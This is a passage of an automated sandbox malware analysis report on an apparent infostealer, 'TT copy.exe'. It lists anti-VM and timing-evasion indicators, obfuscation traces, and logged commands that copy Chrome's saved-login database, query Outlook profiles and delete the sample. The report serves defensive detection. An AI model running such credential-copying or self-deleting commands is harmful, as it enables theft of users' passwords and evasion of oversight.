            Source: TT copy.exe, 00000000.00000002.293699875.0000000006E50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCerbera.dll" vs TT copy.exe
            Source: TT copy.exe, 00000000.00000000.249696202.00000000005C4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStreamingContextSta.exeJ vs TT copy.exe
            Source: TT copy.exe, 00000000.00000002.294087756.0000000007160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIVectorView.dllN vs TT copy.exe
            Source: TT copy.exe, 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIVectorView.dllN vs TT copy.exe
            Source: TT copy.exe, 00000003.00000002.358699164.000000000115F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT copy.exe
            Source: TT copy.exe, 00000003.00000002.358925286.00000000012EF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT copy.exe
            Source: TT copy.exe, 00000003.00000000.276422177.00000000005C4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStreamingContextSta.exeJ vs TT copy.exe
            Source: TT copy.exe, 00000003.00000003.278076755.0000000000E1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT copy.exe
            Source: TT copy.exe, 00000003.00000002.358488954.0000000000FFC000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs TT copy.exe
            Source: TT copy.exe, 00000003.00000003.286643479.0000000000FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT copy.exe
            Source: TT copy.exeBinary or memory string: OriginalFilenameStreamingContextSta.exeJ vs TT copy.exe
            Source: TT copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: TT copy.exeVirustotal: Detection: 34%
            Source: C:\Users\user\Desktop\TT copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\TT copy.exe "C:\Users\user\Desktop\TT copy.exe"
            Source: C:\Users\user\Desktop\TT copy.exeProcess created: C:\Users\user\Desktop\TT copy.exe C:\Users\user\Desktop\TT copy.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT copy.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
            Source: C:\Users\user\Desktop\TT copy.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TT copy.exe.log
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\DB1
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/2@16/9
            Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.ini
            Source: TT copy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\TT copy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_01
            Source: TT copy.exe, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.0.TT copy.exe.520000.0.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.2.TT copy.exe.520000.0.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.0.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.1.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.3.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.5.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.2.TT copy.exe.520000.1.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.7.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.2.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.9.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\TT copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: TT copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: TT copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: TT copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: StreamingContextSta.pdb source: TT copy.exe
            Source: Binary string: wntdll.pdbUGP source: TT copy.exe, 00000003.00000002.358699164.000000000115F000.00000040.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.277558771.0000000000D05000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.283452054.0000000000EA1000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.359728114.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.352750637.0000000004E4D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: TT copy.exe, TT copy.exe, 00000003.00000002.358699164.000000000115F000.00000040.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.277558771.0000000000D05000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.283452054.0000000000EA1000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000003.359728114.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.352750637.0000000004E4D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: TT copy.exe, 00000003.00000002.358458771.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: TT copy.exe, 00000003.00000002.358458771.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp

            Data Obfuscation

            Source: TT copy.exe, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 0.0.TT copy.exe.520000.0.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 0.2.TT copy.exe.520000.0.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.0.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.1.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.3.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.5.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.2.TT copy.exe.520000.1.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.7.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.2.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.9.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_00E5D5C0 push C3FFFFE9h; ret 0_2_00E5D5E4
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_00E5F750 push eax; iretd 0_2_00E5F751
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EB8561 pushfd ; ret 0_2_06EB8565
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE5F49 push es; ret 0_2_06EE5F60
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE6239 push es; iretd 0_2_06EE623C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE3201 push esp; iretd 0_2_06EE3202
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE60BD push es; iretd 0_2_06EE60C8
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041BD87 push 7FF49B4Bh; retf 3_2_0041BD8D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041D672 push eax; ret 3_2_0041D678
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041D67B push eax; ret 3_2_0041D6E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041D625 push eax; ret 3_2_0041D678
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041D6DC push eax; ret 3_2_0041D6E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_00417F2D push cs; retf 3_2_00417F37
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_004177BE push cs; retf 3_2_004177C4
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010BD0D1 push ecx; ret 3_2_010BD0E4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051FD0D1 push ecx; ret 15_2_051FD0E4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4BD87 push 7FF49B4Bh; retf 15_2_00F4BD8D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4D6DC push eax; ret 15_2_00F4D6E2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4D672 push eax; ret 15_2_00F4D678
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4D67B push eax; ret 15_2_00F4D6E2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4D625 push eax; ret 15_2_00F4D678
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F477BE push cs; retf 15_2_00F477C4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F47F2D push cs; retf 15_2_00F47F37
            Source: TT copy.exeStatic PE information: 0xE98C9EE8 [Mon Mar 1 18:37:28 2094 UTC]
            Source: initial sampleStatic PE information: section name: .text entropy: 7.8550082389

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del "C:\Users\user\Desktop\TT copy.exe"
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: 00000000.00000002.287883851.0000000002983000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: TT copy.exe PID: 1800, type: MEMORYSTR
            Source: TT copy.exe, 00000000.00000002.287883851.0000000002983000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: TT copy.exe, 00000000.00000002.287883851.0000000002983000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Source: C:\Users\user\Desktop\TT copy.exe RDTSC instruction interceptor: First address: 0000000000408C14 second address: 0000000000408C1A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\TT copy.exe RDTSC instruction interceptor: First address: 0000000000408FAE second address: 0000000000408FB4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000F38C14 second address: 0000000000F38C1A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000F38FAE second address: 0000000000F38FB4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\TT copy.exe TID: 5700 Thread sleep time: -43731s >= -30000s
            Source: C:\Users\user\Desktop\TT copy.exe TID: 3808 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\TT copy.exe Code function: 3_2_00408EE0 rdtsc 3_2_00408EE0
            Source: C:\Users\user\Desktop\TT copy.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\TT copy.exe API coverage: 6.5 %
            Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 9.4 %
            Source: C:\Users\user\Desktop\TT copy.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00F41670 FindFirstFileW,FindNextFileW,FindClose,15_2_00F41670
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00F4166B FindFirstFileW,FindNextFileW,FindClose,15_2_00F4166B
            Source: C:\Users\user\Desktop\TT copy.exe Thread delayed: delay time: 43731
            Source: explorer.exe, 00000007.00000000.332892277.00000000051AC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.408200731.00000000051F7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
            Source: TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.334319588.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000007.00000000.409396951.0000000005EAB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.295820558.000000000510C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: rundll32.exe, 0000000F.00000002.775195320.00000000034E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775216398.0000000003503000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000007.00000000.408200731.00000000051F7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
            Source: explorer.exe, 00000007.00000000.295820558.000000000510C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: explorer.exe, 00000007.00000000.334319588.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}on:Mondz?S
            Source: TT copy.exe, 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000007.00000000.334319588.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0cY
            Source: C:\Users\user\Desktop\TT copy.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\TT copy.exe Code function: 3_2_01069100 mov eax, dword ptr fs:[00000030h] 3_2_01069100
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108C577 mov eax, dword ptr fs:[00000030h]3_2_0108C577
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108C577 mov eax, dword ptr fs:[00000030h]3_2_0108C577
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092581 mov eax, dword ptr fs:[00000030h]3_2_01092581
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092581 mov eax, dword ptr fs:[00000030h]3_2_01092581
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092581 mov eax, dword ptr fs:[00000030h]3_2_01092581
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092581 mov eax, dword ptr fs:[00000030h]3_2_01092581
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01062D8A mov eax, dword ptr fs:[00000030h]3_2_01062D8A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01062D8A mov eax, dword ptr fs:[00000030h]3_2_01062D8A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01062D8A mov eax, dword ptr fs:[00000030h]3_2_01062D8A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01062D8A mov eax, dword ptr fs:[00000030h]3_2_01062D8A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01062D8A mov eax, dword ptr fs:[00000030h]3_2_01062D8A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109FD9B mov eax, dword ptr fs:[00000030h]3_2_0109FD9B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109FD9B mov eax, dword ptr fs:[00000030h]3_2_0109FD9B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010935A1 mov eax, dword ptr fs:[00000030h]3_2_010935A1
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01091DB5 mov eax, dword ptr fs:[00000030h]3_2_01091DB5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01091DB5 mov eax, dword ptr fs:[00000030h]3_2_01091DB5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01091DB5 mov eax, dword ptr fs:[00000030h]3_2_01091DB5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011305AC mov eax, dword ptr fs:[00000030h]3_2_011305AC
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011305AC mov eax, dword ptr fs:[00000030h]3_2_011305AC
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov eax, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov eax, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov eax, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov ecx, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov eax, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov eax, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01118DF1 mov eax, dword ptr fs:[00000030h]3_2_01118DF1
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107D5E0 mov eax, dword ptr fs:[00000030h]3_2_0107D5E0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107D5E0 mov eax, dword ptr fs:[00000030h]3_2_0107D5E0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112FDE2 mov eax, dword ptr fs:[00000030h]3_2_0112FDE2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112FDE2 mov eax, dword ptr fs:[00000030h]3_2_0112FDE2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112FDE2 mov eax, dword ptr fs:[00000030h]3_2_0112FDE2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112FDE2 mov eax, dword ptr fs:[00000030h]3_2_0112FDE2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6C0A mov eax, dword ptr fs:[00000030h]3_2_010E6C0A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6C0A mov eax, dword ptr fs:[00000030h]3_2_010E6C0A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6C0A mov eax, dword ptr fs:[00000030h]3_2_010E6C0A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6C0A mov eax, dword ptr fs:[00000030h]3_2_010E6C0A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113740D mov eax, dword ptr fs:[00000030h]3_2_0113740D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113740D mov eax, dword ptr fs:[00000030h]3_2_0113740D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113740D mov eax, dword ptr fs:[00000030h]3_2_0113740D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109BC2C mov eax, dword ptr fs:[00000030h]3_2_0109BC2C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109A44B mov eax, dword ptr fs:[00000030h]3_2_0109A44B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FC450 mov eax, dword ptr fs:[00000030h]3_2_010FC450
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FC450 mov eax, dword ptr fs:[00000030h]3_2_010FC450
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108746D mov eax, dword ptr fs:[00000030h]3_2_0108746D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
